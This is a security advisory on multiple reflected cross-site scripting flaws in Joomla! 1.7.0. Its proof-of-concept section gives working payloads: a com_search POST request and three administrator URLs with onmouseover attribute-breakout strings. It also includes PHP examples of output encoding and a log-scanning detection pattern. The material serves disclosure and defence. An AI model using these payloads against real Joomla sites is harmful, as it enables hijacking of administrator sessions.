Joomla! 1.7.0 Multiple XSS Vulnerabilities and Fix

Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities

 

1. Overview

Joomla! 1.7.0 (stable version) contains multiple cross-site scripting (XSS) vulnerabilities.

 

2. Background

Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model-view-controller (MVC) Web application framework that can also be used independently.

Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.

 

3. Vulnerability Description

Several parameters (searchword, extension, asset, author) in Joomla! core components are not properly sanitized upon submission to the /index.php URL, which allows an attacker to conduct cross-site scripting attacks. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.
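The root cause described above is a request value written into an HTML attribute (extension, asset, author) or into an inline script string (searchword) without encoding for that context. The PHP below is an added illustration and not Joomla's own code: the function names, the hidden-field markup and the hostile-shaped sample value are assumptions made for the example. It renders one value through an unencoded and an encoded path and counts the attributes a DOM parser sees on the result, then shows the JSON-literal approach for the script context and a character-set filter for parameters that name a component.

```php
<?php
// Added example (not Joomla code): the same request value rendered without
// and with context-appropriate encoding. Function names, the markup and the
// hostile-shaped sample value are assumptions made for this illustration.

// Vulnerable pattern: the raw parameter is concatenated into an attribute.
function render_asset_field_vulnerable(string $asset): string
{
    return '<input type="hidden" name="asset" value="' . $asset . '" />';
}

// Hardened pattern for an HTML attribute: ENT_QUOTES turns both " and ' into
// entities, so the value can no longer terminate the attribute it sits in.
function render_asset_field_hardened(string $asset): string
{
    $safe = htmlspecialchars($asset, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="asset" value="' . $safe . '" />';
}

// Hardened pattern for inline script (the searchword case, where the payload
// closes a JS string with an apostrophe): entity encoding is the wrong tool.
// A JSON literal with the HEX flags keeps ' " < > & out of both parsers.
function render_searchword_js_hardened(string $word): string
{
    $lit = json_encode($word, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
    return '<script>var searchword = ' . $lit . ';</script>';
}

// Parameters that name a component or extension should never reach output
// unfiltered: keep only [A-Za-z0-9_.-] (the same idea as Joomla's getCmd
// filter) and then compare the result against the installed components.
function filter_cmd(string $value): string
{
    return preg_replace('/[^A-Za-z0-9_.-]/', '', $value);
}

// Count the attributes an HTML parser sees on the <input>: anything beyond
// type, name and value means the supplied value broke out of its quotes.
function input_attribute_count(string $html): int
{
    libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    $dom->loadHTML($html);
    $input = $dom->getElementsByTagName('input')->item(0);
    return $input === null ? 0 : $input->attributes->length;
}

// Constructed value shaped like the advisory's payloads: a quote, then a handler.
$hostile = '1" onmouseover="alert(1)';

$renders = [
    'vulnerable' => render_asset_field_vulnerable($hostile),
    'hardened'   => render_asset_field_hardened($hostile),
];
foreach ($renders as $label => $html) {
    printf("%-10s attributes=%d  %s\n", $label, input_attribute_count($html), $html);
}

echo render_searchword_js_hardened("search'; onunload=function(){}//"), "\n";
echo filter_cmd('com_content" onmouseover="alert(1)'), "\n";
```

The attribute count is the check worth automating in a template test: the unencoded render gains an extra attribute from the value, the encoded render keeps exactly the three the template declares. Note that the two encodings are not interchangeable; a value that is entity-encoded and then placed inside a script string is still a script-context injection, which is why the searchword path emits a JSON literal instead.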

 

4. Affected Versions: <= 1.7.0

 

5. PROOF-OF-CONCEPT/EXPLOIT

Component: com_search, parameter: searchword (Browser: IE, Konqueror)
============================================================================

[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: www.2cto.com
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
http://www.bkjia.com/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=search'; onunload=function(){x=confirm(
String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,109,10
1,115,115,97,103,101,32,102,114,111,109,100,109,105,110,105,115,11
6,114,97,116,111,114,68,111,32,121,111,117,32,119,97,110,116
6,111,32,103,111,32,116,111,111,120,63);alert(String.fromC
harCode(89,111,117,39,118,101,32,103,111,116,33));};//xsssss
ssssss&option=com_search
[/REQUEST]

++++

 

User login is required to execute the following XSSes.

Parameter: extension, Component: com_categories
==========================================================================

http://www.bkjia.com/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22 style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22

Parameter: asset, Component: com_media
==========================================================================

http://www.bkjia.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22 style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=

Parameter: author, Component: com_media
==========================================================================

http://www.bkjia.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22 style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22

++++
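As a detection aid for requests of the shape listed above, the following PHP is an added example and not part of the advisory: it parses combined-format access-log lines (constructed here, with documentation-range addresses) and flags requests whose extension, asset, author or searchword parameter decodes to something containing a tag opener or an event-handler assignment. The log layout, the sample lines and the helper names are assumptions made for the example.

```php
<?php
// Added example (not from the advisory): scan access-log lines for the
// breakout patterns the advisory's payloads rely on. Everything below,
// including the log lines and addresses, is constructed for illustration.

const WATCHED_PARAMS = ['searchword', 'extension', 'asset', 'author'];

// A decoded parameter value is suspicious if it opens a tag (<tag, </tag,
// <!--) or carries an event-handler assignment such as onmouseover=.
// Lone quotes are deliberately not matched: they are normal in search terms.
function is_suspicious(string $decoded): bool
{
    return (bool) preg_match('/<[a-z\/!]|\bon[a-z]+\s*=/i', $decoded);
}

// Parse one Apache/nginx "combined" log line into its request parts.
// Returns null for lines that do not match the expected layout.
function parse_log_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['client' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int) $m[5]];
}

// Return the watched parameter names whose URL-decoded value is suspicious.
// Only the query string is visible here; a POST body never reaches the log.
function flag_target(string $target): array
{
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query) || $query === '') {
        return [];
    }
    parse_str($query, $params);   // parse_str percent-decodes the values
    $hits = [];
    foreach (WATCHED_PARAMS as $name) {
        if (isset($params[$name]) && is_string($params[$name])
            && is_suspicious($params[$name])) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Scan many lines and collect one finding per flagged request.
function scan_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $entry = parse_log_line($line);
        if ($entry === null) {
            continue;
        }
        $hits = flag_target($entry['target']);
        if ($hits !== []) {
            $findings[] = ['client' => $entry['client'], 'time' => $entry['time'],
                           'params' => $hits, 'target' => $entry['target']];
        }
    }
    return $findings;
}

// Constructed sample: one benign admin request, one request carrying the
// advisory's attribute-breakout shape in "asset", and one POST to index.php
// (the com_search case), whose body is not in the log and so is not flagged.
$sampleLog = [
    '192.0.2.10 - - [05/Sep/2011:10:12:01 +0000] "GET /administrator/index.php?option=com_categories&extension=com_content HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [05/Sep/2011:10:12:07 +0000] "GET /administrator/index.php?option=com_media&view=images&asset=1%22%20onmouseover%3D%22alert%281%29%22&author= HTTP/1.1" 200 3904 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [05/Sep/2011:10:12:09 +0000] "POST /index.php HTTP/1.1" 200 7710 "-" "MSIE 8.0"',
];

foreach (scan_log($sampleLog) as $f) {
    printf("%s %s suspicious params: %s\n  %s\n",
           $f['time'], $f['client'], implode(',', $f['params']), $f['target']);
}
```

Two caveats follow from the advisory itself. The com_search vector is a POST, so the web server log holds only "POST /index.php" and the scanner cannot see the searchword value; catching that case needs a WAF or application-level logging of request bodies. And the handler pattern will also match an innocent search term such as "onion=", so treat hits as triage leads to be correlated with the 200 status and a logged-in administrator session, not as verdicts.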

 

6. IMPACT

Attackers can compromise the session of the currently logged-in user or administrator and perform, on that user's behalf, arbitrary actions available under /administrator/.

 

7. Solutions

 

Upgrade to a later version.

 

8. VENDOR

 

Joomla! Developer Team

http://www.joomla.org

# YEHG []
